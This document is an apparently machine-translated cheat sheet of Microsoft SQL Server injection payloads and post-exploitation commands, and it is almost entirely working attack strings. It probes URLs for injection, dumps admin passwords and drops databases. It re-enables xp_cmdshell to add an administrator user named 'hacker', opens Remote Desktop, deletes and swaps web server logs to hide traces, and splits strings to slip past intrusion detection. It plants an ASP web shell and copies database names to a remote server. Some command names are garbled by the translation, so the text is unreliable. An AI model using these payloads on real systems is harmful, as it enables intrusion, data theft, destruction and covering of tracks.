(Conversion-collection) MSSQL manual injection statement set

And exists (select * from sysobjects) // you can check whether it is MSSQL.

And exists (select * from tableName) // determines whether a table exists. tableName indicates the table name.

And 1 = (select @ VERSION) // MSSQL VERSION

And 1 = (select db_name () // Current Database Name

And 1 = (select @ servername) // local service name

And 1 = (select IS_SRVROLEMEMBER ('sysadmin') // determine whether the system administrator is

And 1 = (Select IS_MEMBER ('db _ owner') // determine whether the database permission is used

And 1 = (Select HAS_DBACCESS ('master') // checks whether the database has read permission.

And 1 = (select name from master. dbo. sysdatabases where dbid = 1) // storm database name DBID is 1, 2, 3 ....

; Declare @ d int // whether multiple rows are supported

And 1 = (Select count (*) FROM master. dbo. sysobjects Where xtype = 'X' AND name = 'xp _ existing shell') // determine whether xp_existing shell exists

And 1 = (select count (*) FROM master. dbo. sysobjects where name = 'xp _ regread ') // check whether the XP_regread extended stored procedure has been deleted

User test who adds and deletes a SA permission: (the SA permission is required)

Exec master. dbo. sp_addlogin test, password

Exec master. dbo. sp_addsrvrolemember test, sysadmin

Stop or activate a service. (SA permission required)

Exec master.. xp_servicecontrol 'stop', 'schedule'

Exec master.. xp_servicecontrol 'start', 'schedule'

Violent website directory

Create table labeng (lala nvarchar (255), id int)

DECLARE @ result varchar (255) EXEC master. dbo. xp_regread 'HKEY _ LOCAL_MACHINE ', 'System \ ControlSet001 \ Services \ W3SVC \ Parameters \ Virtual Roots', '/', @ result output insert into labeng (lala) values (@ result );

And 1 = (select top 1 lala from labeng) or and 1 = (select count (*) from labeng where lala> 1)

-----------------------------------------------------

 

Open 3389 under DOS and modify the port number

SC config termservice start = auto

Net start termservice

// Allow external connections

Reg add "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server"/v fDenyTSConnections/t REG_DWORD/d 0x0/f

// Port 3389 to port 80

Reg add "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp"/v PortNumber/t REG_DWORD/d 80/f

SQL Server

 

Determine whether injection is allowed:

Http://www.targer.com/article.asp? Id = 6

Http://www.targer.com/article.asp? Id = 6'

Http://www.targer.com/article.asp? Id = 6 and 1 = 1

Http://www.targer.com/article.asp? Id = 6 and 1 = 2

Http://www.targer.com/article.asp? Action = value' and 1 = 1

Http://www.targer.com/article.asp? Action = value' and 1 = 2

Searchpoints % 'and 1 = 1

Searchpoints % 'and 1 = 2

 

Determine the database type:

Http://www.targer.com/article.asp? Id = 6 and user> 0

Http://www.targer.com/article.asp? Id = 6 and (select count (*) from sysobjects)> 0

 

Query the current user data:

Article. asp? Id = 6 having 1 = 1 --

 

Columns in the current table:

Article. asp? Id = 6 group by admin. username having 1 = 1 --

Article. asp? Id = 6 group by admin. username, admin. password having 1 = 1 --

 

Arbitrary tables and columns:

And (select top 1 name from (select top N id, name from sysobjects where xtype = char (85) T order by id desc)> 1

And (select top col_name (object_id ('admin'), N) from sysobjects)> 1

 

Violent database data:

And (select top 1 password from admin where id = N)> 1

 

Modify data in the database:

; Update admin set password = 'oooooooo 'where username = 'xxx'

 

Add data in the database:

; Insert into admin values (xxx, Oooooooo )--

 

Delete database:

; Drop database webdata

 

Get the current database username: and user> 0

Get the current database name: and db_name ()> 0

Obtain the database version: and (select @ version)> 0

 

Determine whether multi-sentence queries are supported:; declare @ a int --

Determine whether subqueries are supported: and (select count (1) from [sysobjects])> = 0

 

Extended database Stored Procedure: exec master .. xp_mongoshell

View the directory of server c:; exec_master .. xp_mongoshell 'dir c :\'

Determine whether the extended stored procedure exists: and select count (*) from master. dbo. sysobjects where xtype = 'X' and name = 'xp _ shortshell'

Restore extended stored procedure:; exec sp_addextendedproc xp_mongoshell, 'xp log70. dll'

Delete the extended stored procedure:; exec sp_dropextendedproc 'xp _ export shell'

 

MSSQL2000 provides some functions for indirectly obtaining permissions to access OLE objects:

; Declare @ s int

; Exec sp_oacreat 'wscript. shell', @ s

; Exec master .. spoamethod @s,'run', null,'cmd.exe/c dir c :\'

 

Determine whether the current database user name has high permissions:

And 1 = (select is_srvrolemember ('sysadmin '))

And 1 = (select is_srvrolemember ('serveradmin '))

And 1 = (select is_srvrolemember ('setupadmin '))

And 1 = (select is_srvrolemember ('securityadmin '))

And 1 = (select is_srvrolemember ('diskadmin '))

And 1 = (select is_srvrolemember ('bulkadmin '))

 

Determine whether the current database user name is DB_OWNER:

And 1 = (select is_member ('db _ owner '))

 

All database information in the SQLSERVER database system is stored in the master. dbo. sysdatabases table of SQLSERVER. You only need the PUBLIC permission to SELECT the table:

And (select top 1 name from master. dbo. sysdatabase order by dbid)> 0

And (select top 1 name from master. dbo. sysdatabase where name not in (select top 1 name from master. dbo. sysdatabases order by dbid)> 0

 

Delete log records:

; Exec master. dbo. xp_cmdshell 'del c: \ winnt \ system32 \ logfiles \ w3svc5 \ ex070606.log> c: \ temp.txt'

 

Replace log records:

Exec master. dbo. xp_mongoshell 'Copy c: \ winnt \ system32 \ logfiles \ w3svc5 \ ex070404.log c: \ winnt \ system32 \ logfiles \ w3svc5 \ ex070606.log> c: \ temp.txt'

 

Obtain the WEB path:

; Declare @ shell int

; Exec master .. sp_oamethod 'wscript. shell', @ shell out

; Exec master .. sp_oamethod @shell,'run', null,'cmd.exe/c dir/s d:/index. asp> c:/log.txt

 

Search by XP_CMDSHELL:

; Exec master .. xp_mongoshell 'dir/s d:/index. asp'

 

Command for displaying server website configuration information:

Cmd/c cscript.exe c: \ inetpub \ adminscript \ adsutil. vbs enum w3svc/1/root

Cmd/c cscript.exe c: \ inetpub \ adminscript \ adsutil. vbs enum w3svc/2/root

 

Use XP_REGREAD to read data with PUBLIC permissions:

; Exec master. dbo. xp_regread

Hkey_local_machine,

'System \ currentcontrolset \ services \ w3svc \ parameters \ virtual roots \'

'/'

 

For more information about the advanced technologies of SQLSERVER, see chapter 5 of proficient script hacker by Zeng yunhao.

 

3. DSqlHelper

 

Check permission SYSADMIN:

And 1 = (select IS_SRVROLEMEMBER ('sysadmin '))

Serveradmin, setupadmin, securityadmin, diskadmin, bulkadmin, and db_owner.

 

Check XP_CMDSHELL (CMD command ):

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = 'xp _ mongoshell ')

Check XP_REGREAD (Registry READ function ):

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = 'xp _ regread ')

Check SP_MAKEWEBTASK (backup function ):

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = 'SP _ makewebtask ')

Test SP_ADDEXTENDEDPROC:

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = 'SP _ addextendedproc ')

Check the XP_SUBDIRS read subdirectory:

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = 'xp _ subdirs ')

Check the XP_DIRTREE read subdirectory:

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = 'xp _ dirtree ')

 

Modification content:

; UPDATE table name set field = content where 1 = 1

 

Xp_mongoshell Detection:

; Exec master .. xp_mongoshell 'dir c :\'

Fix XP_CMDSHELL:

; Exec master. dbo. sp_addextendedproc 'xp _ mongoshell', 'xp log70. dll'

Use XP_CMDSHELL to add a user hacker:

; Exec master. dbo. xp_mongoshell 'net user hacker 123456/add'

Xp_mongoshell adds the user hacker to the ADMIN group:

; Exec master. dbo. xp_mongoshell 'net localgroup administrators hacker/add'

 

Create Table test:

; Create table [dbo]. [test] ([dstr] [char] (255 ));

Test:

And exists (select * from test)

Location for reading the WEB (read the Registry ):

; DECLARE @ result varchar (255) EXEC master. dbo. xp_regread 'HKEY _ LOCAL_MACHINE ', 'System \ ControlSet001 \ Services \ W3SVC \ Parameters \ Virtual Roots', '/', @ result output insert into test (dstr) values (@ result );--

The absolute path of the WEB is exposed (the explicit error mode ):

And 1 = (select count (*) from test where dstr> 1)

Delete table test:

; Drop table test ;--

 

Create a table dirs to view the directory:

; Create table dirs (paths varchar (100), id int)

Add the contents of the viewed directory to the dirs table:

; Insert dirs exec master. dbo. xp_dirtree 'C :\'

Burst directory content dirs:

And 0 <> (select top 1 paths from dirs)

Backup database DATANAME:

Declare @ a sysname; set @ a = db_name (); backup DATANAME @ a to disk = 'C: \ inetpub \ wwwroot \ down. bak ';--

Delete table dirs:

; Drop table dirs ;--

 

Create Table temp:

; Create table temp (id nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));--

Add the drive disk list to the temp table:

; Insert temp exec master. dbo. xp_availablemedia ;--

Delete table temp:

; Delete from temp ;--

 

Create Table dirs:

; Create table dirs (paths varchar (100), id int );--

Obtain the subdirectory list XP_SUBDIRS:

; Insert dirs exec master. dbo. xp_subdirs 'C :\';--

Burst content (explicit error mode ):

And 0 <> (select top 1 paths from dirs)

Delete table dirs:

; Delete from dirs ;--

 

Create Table dirs:

; Create table dirs (paths varchar (100), id int )--

Use XP_CMDSHELL to view the directory content:

; Insert dirs exec master .. xp_mongoshell 'dir c :\'

Delete table dirs:

; Delete from dirs ;--

 

Check SP_OAcreate (Execute Command ):

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = 'SP _ OAcreate ')

SP_OAcreate:

; DECLARE @ shell int exec SP_OAcreate 'wscript. shell ', @ shell output exec SP_OAMETHOD @ shell, 'run', null, 'c: \ windows \ system32 \ cmd.exe/C net user hacker 123456/add'

SP_OAcreate directory:

; DECLARE @ shell int exec SP_OAcreate 'wscript. shell ', @ shell output exec SP_OAMETHOD @ shell, 'run', null, 'c: \ windows \ system32 \ cmd.exe/C md E: \ XkCmsV \ webForm \ 1111'

Create a virtual directory edisk:

; Declare @ o int exec sp_oacreate 'wscript. shell ', @ o out exec sp_oamethod @ o, 'run', NULL, 'cscript.exe c: \ inetpub \ wwwroot \ mkwebdir. vbs-w "Default Web site"-v "e", "e :\"'

Set virtual directory E to readable:

; Declare @ o int exec sp_oacreate 'wscript. shell ', @ o out exec sp_oamethod @ o, 'run', NULL, 'cscript.exe c: \ inetpub \ wwwroot \ chaccess. vbs-a w3svc/1/ROOT/e + browse'

Start the SERVER Service:

; Exec master .. xp_servicecontrol 'start', 'server'

Attackers can bypass IDS detection xp_javasshell:

; Declare @ a sysname set @ a = 'xp _ '+ 'your shell' exec @ a' dir c :\'

Enable remote database 1:

; Select * from OPENROWSET ('sqloledb', 'server = servername; uid = sa; pwd = apachy_123 ', 'select * from table1 ')

Enable remote database 2:

; Select * from OPENROWSET ('sqloledb', 'uid = sa; pwd = apachy_123; Network = DBMSSOCN; Address = 202.100.100.1, 1433; ', 'select * from table'

// Check the permissions.

And 1 = (Select IS_MEMBER ('db _ owner '))

And char (124) % 2 BCast (IS_MEMBER ('db _ owner') as varchar (1) % 2 Bchar (124) = 1 ;--

// Check whether you have the permission to read a database

And 1 = (Select HAS_DBACCESS ('master '))

And char (124) % 2 BCast (HAS_DBACCESS ('master') as varchar (1) % 2 Bchar (124) = 1 --

 

Numeric type

And char (124) % 2 Buser % 2 Bchar (124) = 0

Character Type

'And char (124) % 2 Buser % 2 Bchar (124) = 0 and ''='

Search type

'And char (124) % 2 Buser % 2 Bchar (124) = 0 and' % '='

Brute-force Username

And user> 0

'And user> 0 and ''='

Check whether the permission is SA

And 1 = (select IS_SRVROLEMEMBER ('sysadmin '));--

And char (124) % 2 BCast (IS_SRVROLEMEMBER (0x730079007300610064006D0069006E00) as varchar (1) % 2 Bchar (124) = 1 --

Check whether MSSQL database is used

And exists (select * from sysobjects );--

Check whether multiple rows are supported

; Declare @ d int ;--

Restore xp_mongoshell

; Exec master .. dbo. sp_addextendedproc 'xp _ mongoshell', 'xp log70. dll ';--

 

Select * from openrowset ('sqloledb', 'server = 192.168.1.200, 1433; uid = test; pwd = pafsp', 'select @ version ')

//-----------------------

// Execute the command

//-----------------------

First, enable the sandbox mode:

Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Jet \ 4.0 \ Engines', 'sandboxmode', 'reg _ dword', 1

Then run the system command using jet. oledb.

Select * from openrowset ('Microsoft. jet. oledb.4.0 ','; database = c: \ winnt \ system32 \ ias. mdb ', 'select shell ("cmd.exe/c net user admin admin1234/add ")')

Execute Command

; DECLARE @ shell int exec SP_OAcreate 'wscript. shell ', @ shell output exec SP_OAMETHOD @ shell, 'run', null, 'c: \ WINNT \ system32 \ cmd.exe/C net user paf pafpaf/add ';--

EXEC [master]. [dbo]. [xp_mongoshell] 'COMMAND/c md c: \ 8080'

Determine whether the xp_mongoshell extended storage process exists:

Http: // 192.168.1.5/display. asp? Keyno = 188 and 1 = (Select count (*) FROM master. dbo. sysobjects Where xtype = 'X' AND name = 'xp _ Your shell ')

Write registry

Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Jet \ 4.0 \ Engines', 'sandboxmode', 'reg _ dword', 1

REG_SZ

Read Registry

Exec master.. xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon', 'userinit'

Read directory content

Exec master .. xp_dirtree 'C: \ winnt \ system32 \ ', 1, 1

 

Database Backup

Backup database pubs to disk = 'C: \ 123. Bak'

// Burst length

And (Select char (124) % 2 BCast (Count (1) as varchar (8000) % 2 Bchar (124) From D99_Tmp) = 0 ;--

To change the sa password, run the following command:

Exec sp_password NULL, 'new password', 'sa'

Test:

Exec master. dbo. sp_addlogin test, ptlove

Exec master. dbo. sp_addsrvrolemember test, sysadmin

Delete the xp_mongoshell statement in the extended stored procedure:

Exec sp_dropextendedproc 'xp _ export shell'

Added extended storage process

EXEC [master] .. sp_addextendedproc 'xp _ proxiedadata', 'c: \ winnt \ system32 \ sqllog. dll'

GRANT exec On xp_proxiedadata TO public

 

Stop or activate a service.

Exec master.. xp_servicecontrol 'stop', 'schedule'

Exec master.. xp_servicecontrol 'start', 'schedule'

Dbo. xp_subdirs

Only list subdirectories in a directory.

Xp_getfiledetails 'C: \ Inetpub \ wwwroot \ SQLInject \ login. asp'

Dbo. xp_makecab

Compress multiple target files to a specific target file.

All files to be compressed can be connected to the end of the parameter column and separated by commas.

Dbo. xp_makecab

'C: \ test. cab', 'mszip ', 1,

'C: \ Inetpub \ wwwroot \ SQLInject \ login. asp ',

'C: \ Inetpub \ wwwroot \ SQLInject \ securelogin. asp'

Xp_terminate_process

Stop a program in execution, but assign the Process ID parameter.

Select "View"-"select field" in the "Work administrator" menu to view the Process ID of each execution program.

Xp_terminate_process 2484

Xp_unpackcab

Uncompress the file.

Xp_unpackcab 'C: \ test. cab', 'c: \ temp ', 1

 

A computer installed with radmin, the password was modified, and regedit.exewas not found to be deleted or changed, and net.exe did not exist. There is no way to use regedit/e to import the registration file, but mssql is the sa permission. Execute the master using the following command. dbo. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'System \ RAdmin \ v2.0 \ Server \ Parameters', 'parameter ', 'reg _ BINARY', 0x02ba5e187e2589be6f80da0046aa7e3c, you can change the password to 12345678. If you want to modify the port value EXEC master. dbo. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'System \ RAdmin \ v2.0 \ Server \ Parameters', 'Port', 'reg _ BINARY ', and 0xd20400 change port value to 1234

Create database lcx;

Create TABLE ku (name nvarchar (256) null );

Create TABLE biao (id int NULL, name nvarchar (256) null );

// Obtain the Database Name

Insert into opendatasource ('sqloledb', 'server = 211.39.145.163, 1443; uid = test; pwd = pafpaf; database = lcx '). lcx. dbo. ku select name from master. dbo. sysdatabases

 

// Create a table in the Master to check the Permissions

Create TABLE master .. D_TEST (id nvarchar (4000) NULL, Data nvarchar (4000) NULL );--

Use sp_makewebtask to directly write a sentence in the web directory:

Http: // 127.0.0.1/dblogin123.asp? Username = 123 '; exec % 20sp_makewebtask % 20 'd: \ www \ tt \ 88. asp ',' % 20 select % 20 ''<% 25 execute (request (" a ") % 25>'' % 20 ';--

// Update table content

Update films SET kind = 'dramatic 'Where id = 123

// Delete content

Delete from table_name where Stockid = 3